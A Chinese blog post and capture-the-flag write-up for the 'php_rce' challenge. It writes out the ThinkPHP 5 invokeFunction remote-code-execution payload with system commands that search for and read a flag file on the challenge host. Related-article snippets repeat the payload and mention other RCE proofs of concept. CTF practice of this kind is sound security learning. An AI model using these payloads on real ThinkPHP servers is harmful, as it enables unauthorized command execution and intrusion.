攻防世界php-rce

最新推荐文章于 2024-08-02 16:10:06 发布
最新推荐文章于 2024-08-02 16:10:06 发布
阅读量170 收藏
点赞数
文章标签: p2p 网络协议 网络 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/evil_ming/article/details/124773811
版权

 

百度一下thinkphp,找到几个get传参的webshell漏洞,直接cv过来一个个试

s=index/think\App/invokeFunction&fun
ction=call_user_func_array&vars[0]=sys
tem&vars[1][]=命令

先试试dir来查看包含的文件

没有看见我们喜闻乐见的flag.txt,又不想一个个file的找,那就现学现卖一个新命令直接去找flag文件

s=index/think\App/invokeFunction&fun
ction=call_user_func_array&vars[0]=sys
tem&vars[1][]=find / -name "*flag"

 

找到我们需要的flag文件,这时候我手贱了一下输入\s查看上级文件

/index.php?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20"*flag"\s

 

嘛,有点多东西返回返回

 我们直接用cat去看flag文件

http://111.200.241.244:60692/index.php?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

 得到flag,记得cat后面加空格。

evil_ming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bypass-PHP-GD-Process-To-RCE:参考
06-14
绕过-PHP-GD-Process-To-RCE 描述 使用 Similar-Block-Attack 绕过 PHP-GD 进程到 RCE。 用法 用法: php codeinj.php <src> <inj> php codeinj.php demo.gif "<?php phpinfo();?>" 然后新图像“gd_demo.gif...
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
spring对shiro注解支持的原理
热门推荐
九十的博客
07-22 1万+
背景介绍:        笔者最近要开发一个开放的管理后台,既然是给大量的用户做的,就必须要考虑到用户的权限问题,做到安全的管理,笔者以前用过的是spring security(简称ss), 但是根据网上的资料和同事的推荐,发现使用shiro来做权限控制比ss更好一些,尤其是spring组织的项目也是用的shiro,没有用自家的ss,所以笔者准备入shiro坑 本篇文章主要讲的是sp
[CTF_网络安全] 攻防世界 php_rce 解题详析
Z4400840的博客
05-24 1128
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。下面简单介绍一种常见的远程 RCE 漏洞利用方式,即利用 PHP 中的eval函数实现 RCE 的方式。
攻防世界——php_rce
weixin_73942557的博客
10-16 205
在网上查找这个东西,发现有远程命令执行漏洞。利用已经构造好的payload直接上。看到了flag查看路径获取它。攻防世界——php_rce。使用whereis命令查找
攻防世界-php_rce
m0_49025459的博客
12-21 250
网络中,以http开头的链接都是绝对路径,绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,绝对路径一般在CGI程序的路径配置中经常用到,而在制作网页中实际很少用到。2、绝对路径:就是你的主页上的文件或目录在硬盘上真正的路径。绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,比如,你的Perl 程序是存放在 c:/apache/1、相对路径:顾名思义,相对路径就是相对于当前文件的路径。-bin 下的,那么 c:/apache/cgi-bin就是cgi-bin目录的绝对路径。:代表目前所在的目录。
攻防世界-php_rce(远程执行漏洞)
m0_62094846的博客
12-21 1375
打开可以看到一个比较真实的网站,也有超链接可以连接到其他的网站 看到ThinkPHP就可以想到远程执行漏洞(看wp) 语句: index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 index.php?s=index/\think\app/invokefunction&function=call_use...
攻防世界php_rce,一道简单的thinkphp题目
m0_73683234的博客
03-17 940
php_rce题目
攻防世界php_rce,攻防世界-web-高手进阶区003-php_rce
weixin_39798626的博客
03-13 67
1.thinkphp5 rce漏洞,构造payload,?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%272.寻找flag?s=/index/\think\app/invokefunc...
攻防世界php_rce
weixin_52268949的博客
01-20 887
php_rce 进入题目提示为ThinkPHP V5 遇到这种题我们一般去找一下框架的rce漏洞即可,搜索到这样一篇文章 https://www.freebuf.com/articles/web/289860.html 然后我们直接使用这里面的payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功rce 接下来就是找fl
php_rce(攻防世界lv.2)
qq_66013948的博客
10-25 314
可以看到当前目录内的文件,既然这样能够成功,那么我们就可以试着把退回根目录找有关flag的文件夹或者文件,最后在根目录上找的了个flag的文件夹,之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞,可以去。里面看有关漏洞的分析,通常构造的payload为。可以看到flag了。
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
【Oracle EBS R12】第二章 P2P &O2C cycle(中文版)
最新发布
Hellen_201903的博客
08-02 88
Oracle EBS R12P2P cycleO2C cycleP2P &O2C cycle P2P cycle O2C cycle P2P &O2C cycle
【计算机网络】三次握手、四次挥手
m0_64280569的博客
07-23 1262
问:三次握手 四次挥手TCP 连接过程是 3 次握手,终止过程是 4 次挥手。
计算机基础(Windows 10+Office 2016)教程 —— 第4章 计算机网络与Internet(下)
m0_70617423的博客
07-31 1040
局域网 Internet Internet的应用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值